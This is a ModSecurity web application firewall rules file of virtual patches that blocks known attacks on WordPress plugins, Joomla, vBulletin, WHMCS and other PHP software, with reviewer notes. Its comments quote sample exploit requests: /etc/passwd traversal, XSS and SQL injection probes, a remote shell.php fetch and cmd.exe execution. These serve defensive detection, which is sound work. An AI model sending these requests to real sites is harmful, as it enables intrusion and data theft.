"phase:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:344477,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: ProjeQtor 4.5.2 Shell Upload attack'" #persistant=*'"` SecRule REQUEST_FILENAME "/main\.php" "chain,phase:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:344479,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: 
Centreon 2.6.1 Command Injection Vulnerability attack'" SecRule ARGS:persistant "\'\"\`" "t:none,t:urlDecodeUni" #/avatar/image_name /.*php2345 SecRule REQUEST_FILENAME "/avatar/image_name/.*\.ph(?:p|tml|t)" "phase:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:343478,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Collabtive 2.0 Shell Upload attack'" #img/media/.*/.*.php #SecRule REQUEST_FILENAME "/img/media/.*/.*\.ph(?:p|t|tml)" "phase:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:343480,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Centreon 2.6.1 Unrestricted File Upload Vulnerability attack'" #/test/logo/.*php SecRule REQUEST_FILENAME "/test/logo/.*\.ph(?:p|t|tml)" "phase:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:343481,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Vtiger CRM 6.3 Remote Code Execution attack'" #/wp-content/plugins/navis-documentcloud/js/window.php?wpbase=%22%3Ealert(%27xss%27)%3C/script%3E%3Cscript%20src=%22 SecRule REQUEST_FILENAME "js/window\.php" "chain,phase:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:348476,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Wordpress Plugin Navis Documentcloud XSS Vulnerability attack'" SecRule ARGS:wpbase "(?:script|\" ?>)" "t:none,t:urlDecodeUni,t:lowercase,t:compressWhiteSpace" SecRule REQUEST_URI "/pluck/" "id:335895,phase:2,t:none,t:urlDecodeUni,t:lowercase,pass,nolog,noauditlog,skip:1" SecAction "phase:2,id:349303,t:none,pass,nolog,noauditlog,skipAfter:END_PHP_JITP_PLUCK" SecRule REQUEST_FILENAME "pluck/admin\.php" "chain,phase:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:348477,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Pluck remote code injection attack '" SecRule ARGS:action "files" "chain,t:none,t:lowercase" Secrule REQUEST_BODY "php" 
"t:none,t:lowercase" #files/phpinfo.php5 SecRule REQUEST_FILENAME "pluck/files/phpinfo\.php5" "phase:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:348478,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Pluck recon phpinfon attack '" SecMarker END_PHP_JITP_PLUCK #wp-content/plugins/wp-symposium/get_album_item.php?size=version%28%29%20;%20-- #version() ; -- SecRule REQUEST_FILENAME "get_album_item\.php" "chain,phase:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:347475,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Wordpress Plugin wp-symposium Unauthenticated SQL Injection Vulnerability attack'" SecRule ARGS:size "(?:version|--| )" "t:none,t:urlDecodeUni,t:lowercase" #WordPress WP Symposium Plugin 15.1 - Blind SQL Injection SecRule REQUEST_FILENAME "forum_functions\.php" "chain,phase:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:347476,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Wordpress Plugin wp-symposium Unauthenticated SQL Injection Vulnerability attack'" SecRule ARGS:topic_id "(?:sleep|select|\(| )" "t:none,t:urlDecodeUni,t:lowercase" #avatarurl=http://localhost:11211 #profile.php SecRule REQUEST_FILENAME "profile\.php" "chain,phase:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:347474,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: vBulletin Memcache Remote Code Execution Attack'" SecRule ARGS:avatarurl "https?\://(?:localhost|127\.)" "t:none,t:urlDecodeUni,t:lowercase" #Microweber v1.0.3 File Upload Filter Bypass Remote PHP Code Execution SecRule REQUEST_FILENAME "/userfiles/media/[a-z]+/uploaded/*\.php" "phase:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:337472,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Microweber v1.0.3 File Upload Filter Bypass Remote PHP Code Execution attempt'" #These really asrent 
necessary, the generic rules already stop these #WordPress WPTF Image Gallery 1.03 File Download #/wp-content/plugins/wptf-image-gallery/lib-mbox/ajax_load.php?url=/etc/passwd #Remote file download in simple-image-manipulator v1.0 wordpress plugin #/wp-content/plugins/./simple-image-manipulator/controller/download.php?filepath=/etc/passwd" #/wp-content/plugins/recent-backups/download-file.php?file_link=/etc/passwd #/wp-content/plugins/candidate-application-form/downloadpdffile.php?fileName=../../../../../../../../../../etc/passwd SecRule REQUEST_FILENAME "(?:wptf-image-gallery/lib-mbox/ajax_load\.php|simple-image-manipulator/controller/download\.php|recent-backups/download-file\.php|candidate-application-form/downloadpdffile\.php)" "chain,phase:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,t:compressWhiteSpace,id:337473,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Generic wordpress plugins Upload Filter Bypass Remote file access attempt'" SecRule ARGS:url|ARGS:filename|ARGS:file_link|ARGS:filepath "/(?:etc|home|var|root|usr)/" "t:none,t:urlDecodeUni,t:lowercase" #WordPress Fast Image Adder 1.1 Shell Upload #/wp-content/plugins/fast-image-adder/fast-image-adder-uploader.php?confirm=url&url=http://192.168.0.2/shell.php SecRule REQUEST_FILENAME "/plugins/fast-image-adder/fast-image-adder-uploader\.php" "chain,phase:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,t:compressWhiteSpace,id:337474,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: WordPress Fast Image Adder 1.1 Shell Upload attack'" SecRule ARGS:url "^(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/" #https://localhost/phpFileManager-0.9.8/index.php?action=6¤t_dir=C:/xampp/htdocs/phpFileManager-0.9.8/&cmd=c%3A\Windows\system32\cmd.exe SecRule REQUEST_FILENAME "/index\.php" "chain,phase:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:337475,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just 
In Time Patch: WordPress Fast Image Adder 1.1 Shell Upload attack'"
    SecRule &ARGS:Action "@eq 1" "t:none,chain"
    SecRule ARGS:current_dir "^[a-z]\:" "chain,t:none,t:urlDecodeUni,t:lowercase"
    SecRule ARGS:cmd "\.exe$" "t:none,t:urlDecodeUni,t:cmdLine"

# ---------------------------------------------------------------------------
# uploadify.php section
# (the original heading here read "#admin-ajax.php attacks"; the admin-ajax
# section starts further down, after END_PHP_JITP_UPLOADIFY)
#
# Section guard: 335867 matches uploadify.php requests and skips the next
# directive, so only those requests reach the rules below; for every other
# request 349313 jumps to END_PHP_JITP_UPLOADIFY and nothing in between is
# evaluated.
# ---------------------------------------------------------------------------
SecRule REQUEST_URI "/uploadify\.php" "id:335867,phase:2,t:none,t:urlDecodeUni,t:lowercase,pass,nolog,noauditlog,skip:1"
SecAction "phase:2,id:349313,t:none,pass,nolog,noauditlog,skipAfter:END_PHP_JITP_UPLOADIFY"
#folder=%2fwordpress%2fwp%2dcontent%2fplugins%2fwp%2dproperty%2fthird%2dparty%2fuploadify%2f
#folder=/wordpress/wp-content/plugins/wp-property/third-party/uploadify/
#wp-content/plugins/barclaycart/uploadify
# 337470: deny when the "folder" argument points back into a plugin's own
# uploadify directory (t:urlDecodeUni on the chained rule covers the
# percent-encoded form shown in the first example above).
SecRule REQUEST_URI "/uploadify\.php" "phase:2,chain,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:337470,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Wordpress uploadify upload Attack'"
    SecRule ARGS:folder "/wp-content/.*/uploadify/" "t:none,t:urlDecodeUni,t:lowercase"
# 337471: extension allow-list for uploads. The negated pattern denies any
# Filename/Filedata value whose trailing extension is not in the list.
# The original comment read "Block anything thats not jpg,jpeg,gif,png,mpg,
# mpeg,flv"; the rev:3 pattern below is wider (bmp, tiff, pdf, ps, webp, mp3,
# mp4, svg, swf, office/odf documents, ...) and no longer includes flv.
# NOTE(review): svg and swf can carry active content -- keep them in the list
# only if the application really needs them. The check looks at the file
# name argument only; the stored file's real type is not inspected here.
# NOTE(review): assumes the uploader passes the file name in the Filename or
# Filedata form fields (ARGS) rather than only as the multipart part name
# (FILES_NAMES) -- confirm against the plugin.
SecRule REQUEST_URI "/uploadify\.php" "capture,phase:2,chain,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:337471,rev:3,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: uploadify non-media file upload violation',logdata:'%{TX.0}'"
    SecRule ARGS:Filename|ARGS:Filedata "!((?:m|j)pe?g4?|bmp|tiff?|p(?:(?:p|g|b)m|n(?:g|m)|df|s)|gif|ico|avi|w(?:mv|ebp)|mp(?:3|4)|cgm|svg|swf|og(?:m|v|x)|doc|xls|od(?:t|s)|ppt|wbk)$" "t:none,t:urlDecodeUni,t:lowercase"
# 337476: deny when "src" starts with a stream wrapper / remote scheme.
# This scheme list is longer than the (?:ogg|gopher|data|php|zlib|(?:ht|f)tps?)
# alternation used by the generic RFI rules further down in the file.
SecRule REQUEST_URI "/uploadify\.php" "capture,phase:2,chain,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:337476,rev:3,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: uploadify RFI attack blocked',logdata:'%{TX.0}'"
    SecRule ARGS:src "^(?:ogg|tls|gopher|data|php|glob|phar|dict|ssh2|rar|expect|zip|zlib|(?:ht|f)tps?):/" "t:none,t:urlDecodeUni,t:lowercase"
SecMarker END_PHP_JITP_UPLOADIFY

# 393726: WooCommerce "nuke" action -- evaluated for every request (it sits
# between two guarded sections, not inside one).
# NOTE(review): "deny" appears twice in the action list (also in 393725,
# 393723, 393727, 393728 and 393724); harmless but redundant.
# NOTE(review): the chained test on ARGS:/woo_st/ uses the default @rx
# operator, so "1" matches any woo_st_* value that merely contains a 1
# (e.g. 10); "@eq 1" or "^1$" would match only the value 1.
SecRule REQUEST_URI "wp-admin/(?:index|admin-ajax)\.php" "chain,capture,phase:2,deny,log,auditlog,id:393726,rev:1,t:none,t:urlDecodeUni,t:lowercase,deny,status:403,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Wordpress WooCommerce Privilege Escalation'"
    SecRule ARGS:action "nuke" "t:none,t:urlDecodeUni,t:lowercase,chain"
    SecRule ARGS:/woo_st/ "1" "t:none,t:urlDecodeUni,t:lowercase"
#action=nuke&woo_st_products=1

# ---------------------------------------------------------------------------
# admin-ajax.php attacks
# Section guard (same skip:1 / skipAfter pattern as the uploadify section):
# only /wp-admin/admin-ajax.php requests are evaluated against the rules up to
# END_PHP_JITP_ADMIN_AJAX1, which is why several rules inside test ARGS alone
# without repeating the URI match.
# ---------------------------------------------------------------------------
SecRule REQUEST_URI "/wp-admin/admin-ajax\.php" "id:335865,phase:2,t:none,t:urlDecodeUni,t:lowercase,pass,nolog,noauditlog,skip:1"
SecAction "phase:2,id:349300,t:none,pass,nolog,noauditlog,skipAfter:END_PHP_JITP_ADMIN_AJAX1"
#/wordpress/wp-admin/admin-ajax.php
#action=wpuf_file_upload
# 393725: WP User Frontend upload action -- denied outright, so legitimate
# front-end uploads through this action are blocked too.
SecRule ARGS:action "wpuf_file_upload" "capture,phase:2,deny,log,auditlog,id:393725,rev:1,t:none,t:urlDecodeUni,t:lowercase,t:removecomments,deny,status:403,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Wordpress WP User Frontend Plugin Unrestricted File Upload blocked'"
#Just the silly test case, in case someone panics that the POC "worked"
#wp-admin/admin-ajax.php\?action=umm_switch_action &umm_sub_action=[umm_delete_user_meta|umm_edit_user_meta]&umm_user=SLEEP"
# 393723: User Meta Manager blind-SQLi proof-of-concept signature ("sleep",
# or "select "/"union " as a whole word, in umm_user).
SecRule REQUEST_URI "wp-admin/admin-ajax\.php" "chain,capture,phase:2,deny,log,auditlog,id:393723,rev:1,t:none,t:urlDecodeUni,t:lowercase,deny,status:403,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Wordpress Blind SQLi POC blocked'"
    SecRule ARGS:umm_user "(?:sleep|\b(?:select|union) )" "t:none,t:urlDecodeUni,t:lowercase,t:removecomments"
# 393727 / 393728: User Meta Manager export paths (CSV export; backup in SQL
# mode).
SecRule ARGS:umm_sub_action "umm_get_csv" "capture,phase:2,deny,log,auditlog,id:393727,rev:1,t:none,t:urlDecodeUni,t:lowercase,deny,status:403,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Possible Wordpress User Meta Manager Plugin Information Disclosure attack blocked'"
SecRule ARGS:umm_sub_action "umm_backup" "chain,capture,phase:2,deny,log,auditlog,id:393728,rev:1,t:none,t:urlDecodeUni,t:lowercase,deny,status:403,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Possible Wordpress User Meta Manager Plugin Information Disclosure attack blocked'"
    SecRule ARGS:mode "sql" "t:none,t:urlDecodeUni,t:lowercase"
# 393724: any umm_meta_value containing "administrator" (role change through
# user meta).
SecRule REQUEST_URI "wp-admin/admin-ajax\.php" "chain,capture,phase:2,deny,log,auditlog,id:393724,rev:1,t:none,t:urlDecodeUni,t:lowercase,t:removecomments,deny,status:403,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Wordpress Privilege Escalation attack blocked'"
    SecRule ARGS:umm_meta_value "administrator" "t:none,t:urlDecodeUni,t:lowercase"
#new revslider vuln
#/wp-admin/admin-ajax.php
#action=revslider%5fajax%5faction&client%5faction=update%5fplugin
#action=revslider_ajax_action&client_action=update_plugin
#action=revolution-slider_ajax_action&client_action=update_plugin
#Cookie:
#/wp-admin/admin-ajax.php?action=revslider_ajax_action&client_action=get_captions_css
# 337469: Revslider update_plugin / get_captions_css actions are denied only
# when no "nonce" argument is present at all (&ARGS:nonce @eq 0). A request
# that carries a nonce is passed and its validity is left to WordPress --
# presumably deliberate, so the authenticated admin UI keeps working.
SecRule REQUEST_URI "/wp-admin/admin-ajax\.php" "phase:2,chain,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:337469,rev:3,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Wordpress Revslider upload Attack'"
    SecRule ARGS:action "(?:revslider_ajax_action|revolution-slider_ajax_action)" "chain,t:none,t:urlDecodeUni,t:lowercase"
    SecRule ARGS:client_action "(?:update_plugin|get_captions_css)" "chain,t:none,t:urlDecodeUni,t:lowercase"
    SecRule &ARGS:nonce "@eq 0"
#/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
# 337479: revslider_show_image with an "img" value containing ".php".
# Only PHP targets are covered; the rule does not look at traversal as such.
SecRule REQUEST_URI "/wp-admin/admin-ajax\.php" "phase:2,chain,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:337479,rev:2,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Wordpress Revslider non-image file download Attack'"
    SecRule ARGS:action "revslider_show_image" "chain,t:none,t:urlDecodeUni,t:lowercase"
    SecRule ARGS:img "\.php" "t:none,t:urlDecodeUni,t:lowercase"
SecMarker END_PHP_JITP_ADMIN_AJAX1

#Wordpress XSS
# 336469: stored-XSS signature on comment fields (ARGS whose name contains
# "comment") posted to wp-comments-post.php.
# NOTE(review): the "." in "/wp-comments-post.php" is unescaped and matches
# any character (cosmetic; the rule still fires on the real file name).
# NOTE(review): "capture" is set on the starter rule only, so logdata's
# %{TX.0} records the URI match, not the offending comment fragment.
SecRule REQUEST_URI "/wp-comments-post.php" "phase:2,chain,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,t:compressWhiteSpace,capture,id:336469,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Wordpress Stored XSS Attack',logdata:'%{TX.0}'"
    SecRule ARGS:/comment/ "(?:< ?script|(?:<|< ?/)(?:(?:java|vb)script|about|applet|activex|chrome)|< ?/?i?frame|\%env|(?:\.add|\@)import |asfunction\:|background-image\:|e(?:cma|xec)script|\.fromcharcode|get(?:parentfolder|specialfolder)|\.innerhtml|\< ?input|(?:/|<) ?(?:java|live|j|vb)script!s|lowsrc ?=|mocha\:|\bon(?:abort|blur|change|click|submit|select|dragdrop|focus|key(?:down|press|up)|mouse(?:down|move|out|over|up))\b ?=.|shell\:|window\.location|asfunction:_root\.launch)" "t:none,t:urlDecodeUni,t:lowercase,t:compressWhiteSpace"
#plugin_googlemap2_proxy.php?url=loxer.cf
# 336468: open-proxy guard for the Joomla Google Maps proxy scripts: the
# captured "url" value (TX:1, lowercased by the starter) must begin with the
# request's own Host header, otherwise the request is denied. Runs in phase:1
# because only the URI and headers are needed.
# NOTE(review): TX:1 has been lowercased but %{request_headers.host} is
# inserted as sent; a mixed-case Host header makes @beginsWith fail and
# denies a legitimate request -- verify, and consider copying a lowercased
# Host into a TX variable first.
SecRule REQUEST_URI "plugin_googlemap(?:2_proxy|3_kmlprxy)\.php\?url=(.*)" "phase:1,t:none,t:urlDecodeUni,t:lowercase,capture,chain,log,deny,status:403,auditlog,id:336468,rev:2,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Google Maps plugin for Joomla probe'"
    SecRule TX:1 "!@beginsWith %{request_headers.host}" "t:none,t:lowercase"
#/plus/download.php?open
# 336467: more than one "arrs1[]" argument in a request to /plus/download.php.
# NOTE(review): "capture" is listed twice in the action list (also in 336460
# and 336459); redundant but harmless.
SecRule REQUEST_URI "/plus/download\.php" "phase:2,capture,chain,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,capture,id:336467,rev:3,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Possible chained PHP array injection attack',logdata:'%{TX.0}'"
    SecRule &ARGS:/^arrs1\[\]/ "@gt 1"
# 336460: Open Flash Chart uploader asked to store a script file name.
SecRule REQUEST_URI "/ofc_upload_image\.php" "phase:2,capture,chain,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,capture,id:336460,rev:3,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Open Flash Charts File Upload Attack',logdata:'%{TX.0}'"
    SecRule ARGS:name "\.(?:php|pl|cgi)" "t:none,t:lowercase"
#rsession_init.php?PHPSESSID=000000000000000000000000000000000&failure_redirect_url
# 336459: Plesk rsession_init.php -- the failure_redirect_url value is
# captured into TX:1 (the chained rule has its own "capture") and the request
# is denied unless that URL contains "://<SERVER_NAME>/", i.e. points back to
# this host.
# NOTE(review): this relies on macro expansion inside the @rx pattern
# (%{SERVER_NAME}); confirm the running engine version expands macros there,
# otherwise the literal text never matches and every request carrying a
# failure_redirect_url is denied. TX:1 is lowercased while SERVER_NAME is
# inserted as-is -- a mixed-case server name would also always deny.
SecRule REQUEST_URI "/rsession_init\.php" "phase:2,capture,chain,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,capture,id:336459,rev:3,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Plesk secret_key attack',logdata:'%{TX.0}'"
    SecRule ARGS:failure_redirect_url "^(.*)$" "capture,chain,t:none,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase"
    SecRule TX:1 "!@rx ://%{SERVER_NAME}/" "t:none,t:lowercase"
#WP pingback
#Only uses two headers, URL and Host
#Check for useragent header, if missing, attack
# 336359: xmlrpc.php pingback.ping calls that arrive with exactly one Host
# header and no User-Agent header at all.
# NOTE(review): XML:/* is only populated when the XML request body processor
# is active for this request (e.g. ctl:requestBodyProcessor=XML selected
# earlier for xmlrpc.php); if it is not, the chained rule never matches and
# this signature is silently dead -- confirm.
SecRule REQUEST_URI "/xmlrpc\.php" "phase:2,capture,chain,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,capture,id:336359,rev:2,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Wordpress pingback zombie attack',logdata:'%{TX.0}'"
    SecRule XML:/* "pingback\.ping" "t:none,t:lowercase,chain"
    SecRule &REQUEST_HEADERS:Host "@eq 1" "t:none,chain"
    SecRule &REQUEST_HEADERS:User-Agent "@eq 0" "t:none"
#Vbulletin zeroday
#upgrade.php
#version=install
#htmldata=username
# 331358: upgrade.php with version=install and any htmldata[username]
# argument present (".*" matches every value, so this is a presence test).
SecRule REQUEST_URI "/upgrade\.php" "phase:2,chain,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,capture,id:331358,rev:2,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Vbulletin zero day attack',logdata:'%{TX.0}'"
    SecRule ARGS:version "install" "t:none,t:lowercase,chain"
    SecRule ARGS:htmldata[username] ".*" "t:none,t:lowercase,t:urlDecodeUni"
#AES_ENCRYPT
# 331357: WHMCS -- SQL function / table names in the name or tid* arguments.
# NOTE(review): "registars" in the table list looks like a misspelling of
# "registrars"; as written that alternative cannot match the real table name
# -- verify against the WHMCS schema.
SecRule REQUEST_URI "/(?:clientarea\.php\?action=details|viewticket\.php)" "phase:2,chain,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,capture,id:331357,rev:3,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: WHMCS SQL injection attack',logdata:'%{TX.0}'"
    SecRule ARGS:firstname|ARGS:lastname|ARGS:/^tid/ "(?:aes_encrypt|tbl(?:admins|clients|hosting|servers|tickets|contact|registars|invoices|orders|paymentgateways|verificationdata|gatewaylog|domains|accounts|adminlog))" "t:none,t:lowercase"
#WP 3.6 and lower serialize name change exploit
# 321357: any ":" in first_name/last_name/display_name on wp-admin/profile.php.
# Legitimate display names that contain a colon are denied as well.
# NOTE(review): the "." in "wp-admin/profile.php" is unescaped (cosmetic).
SecRule REQUEST_URI "wp-admin/profile.php" "phase:2,chain,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,capture,id:321357,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: WordPress serialize name change attack',logdata:'%{TX.0}'"
    SecRule ARGS:first_name|ARGS:last_name|ARGS:display_name ":" "t:none,t:urlDecodeUni"
#configuration.php-dist
# 321356: direct request for the Joomla sample configuration file
# (reconnaissance).
SecRule REQUEST_FILENAME "configuration\.php-dist" "phase:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,t:replaceNulls,t:compressWhiteSpace,capture,id:321356,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Joomla probe',logdata:'%{TX.0}'"
#/editor/filemanager/connectors/php/connector.php?Command=GetFoldersAndFiles&Type=File&CurrentFolder=/
# 388000: FCKeditor PHP connector listing / upload commands. As the msg says,
# disable this rule where the connector has been put behind authentication.
# NOTE(review): the example uses "Command=" while the selector is
# ARGS:command -- relies on argument-name selection being case-insensitive;
# confirm on the running engine.
SecRule REQUEST_FILENAME "/editor/filemanager/connectors/php/connector\.php" "phase:2,chain,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,t:replaceNulls,t:compressWhiteSpace,capture,id:388000,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Possible Attempt to Access vulnerable FCKeditor file upload connector (Disable if you have configured this connector to require authentication)',logdata:'%{TX.0}'"
    SecRule ARGS:command "(?:getfoldersandfiles|fileupload)" "t:none,t:urlDecodeUni,t:lowercase"
#PHP version probe using easter eggs
# 380800 / 380801: PHP "easter egg" GUID query strings (...f35 / ...f36 and
# the b8b5f2a0 GUID in 380800, ...f34 in 380801). Fingerprinting only.
# NOTE(review): 380801 sets no status:403 of its own and relies on the active
# SecDefaultAction for the response status.
SecRule REQUEST_URI "php(?:e9568f3[56]-d428-11d2-a769-00aa001acf42|b8b5f2a0-3c92-11d3-a3a9-4c7b08c10000)" "phase:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,t:replaceNulls,t:compressWhiteSpace,capture,id:380800,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: PHP Easter Egg Access',logdata:'%{TX.0}'"
SecRule REQUEST_URI "phpe9568f34-d428-11d2-a769-00aa001acf42" "phase:2,log,deny,auditlog,t:none,t:urlDecodeUni,t:lowercase,t:replaceNulls,t:compressWhiteSpace,capture,id:380801,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: PHP Easter Egg Access',logdata:'%{TX.0}'"

#INJECTION RULES
##RFI/injection rules
# ---------------------------------------------------------------------------
# Section guard: 333866 is a fast @pm pre-filter -- only requests that carry
# one of the listed scheme prefixes somewhere in ARGS or REQUEST_URI reach the
# rules below; everything else jumps to END_PHP_JITP_INJECTION_RULES.
# Keep this list in sync with the scheme alternation used by the rules inside
# the section: a scheme added to an inner rule but missing here is never
# reached. (@pm matching is case-insensitive, which is why the gate carries
# no t:lowercase.)
# ---------------------------------------------------------------------------
SecRule ARGS|REQUEST_URI "@pm http:// https:// ftp:// ftps:// ogg:// zlib:// gopher:// php:// data://" "id:333866,phase:2,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:replaceNulls,t:compressWhiteSpace,pass,nolog,noauditlog,skip:1"
SecAction "phase:2,id:309001,t:none,pass,nolog,noauditlog,skipAfter:END_PHP_JITP_INJECTION_RULES"
#plugin injection
# 390760: any *plugin_dir* argument beginning with a remote scheme, on any
# .php request.
# NOTE(review): chained rules do not inherit the starter's t: list; the
# ARGS:/plugin_dir/ test below runs with whatever SecDefaultAction provides
# (no t:lowercase here), so an upper-case scheme such as "HTTP://" is not
# caught by this rule -- add "t:none,t:lowercase" to the chained rule if that
# matters. The same applies to the chained rules of the 3100xx rules below.
SecRule REQUEST_FILENAME "\.php" "phase:2,chain,log,deny,auditlog,t:none,t:urlDecodeUni,t:lowercase,capture,id:390760,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: RFI Injection Exploit',logdata:'%{TX.0}'"
    SecRule ARGS:/plugin_dir/ "^(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/"
#e107 vulns
# 393756: e107 include-path arguments starting with a remote scheme.
SecRule ARGS:ifile|ARGS:plugindir|ARGS:THEMES_DIRECTORY "^(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/" "phase:2,id:393756,rev:1,severity:1,t:none,t:htmlEntityDecode,t:urlDecode,t:replaceNulls,t:compressWhiteSpace,t:lowercase,capture,deny,log,auditlog,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch:e107 RFI attack',logdata:'%{TX.0}'"
#390655
# 390655 / 390656: SYSURL* and "get" arguments starting with a remote scheme.
# Neither rule sets transformations or a disruptive action; both come from
# SecDefaultAction (so the scheme must already be lower-case in the request
# unless the default action lowercases).
SecRule ARGS:/^SYSURL/ "^(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/" "phase:2,id:390655,rev:1,severity:1,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: SYSURL RFI attack Vulnerability'"
SecRule ARGS:get "^(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/" "phase:2,id:390656,rev:1,severity:1,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: get variable RFI attack Vulnerability'"
# Rule 310019: generic remote file inclusion vulns
# (the rule id is actually 391760; "310019" is reused by several comments in
# this file)
# NOTE(review): "!ARGS:include_location" excludes a variable that the target
# list never included (only ARGS:/gallery_basedir/ is selected), so the
# exclusion is a no-op -- either drop it or, if include_location was meant to
# be inspected too, write "ARGS:/gallery_basedir/|ARGS:include_location".
SecRule ARGS:/gallery_basedir/|!ARGS:include_location "(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/" "phase:2,log,deny,auditlog,t:none,t:urlDecodeUni,t:lowercase,t:replaceNulls,t:compressWhiteSpace,capture,id:391760,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: RFI Injection Exploit',logdata:'%{TX.0}'"
# 395760: Tiki "page" argument.
# NOTE(review): the first three alternatives (gopher|ogg|zlib) have no ":/"
# and match the bare substring anywhere in the value, so e.g. a page name
# containing "ogg" ("blogger") is denied once the @pm gate above has let the
# request in -- probably intended to be the scheme form only.
SecRule REQUEST_FILENAME "tiki-index\.php" "phase:2,chain,log,deny,auditlog,t:none,t:urlDecodeUni,t:lowercase,capture,id:395760,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: RFI Injection Exploit',logdata:'%{TX.0}'"
    SecRule ARGS:page "(?:gopher|ogg|zlib|(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/)"
# The legacy 3100xx rules below pair a REQUEST_FILENAME/REQUEST_URI match with
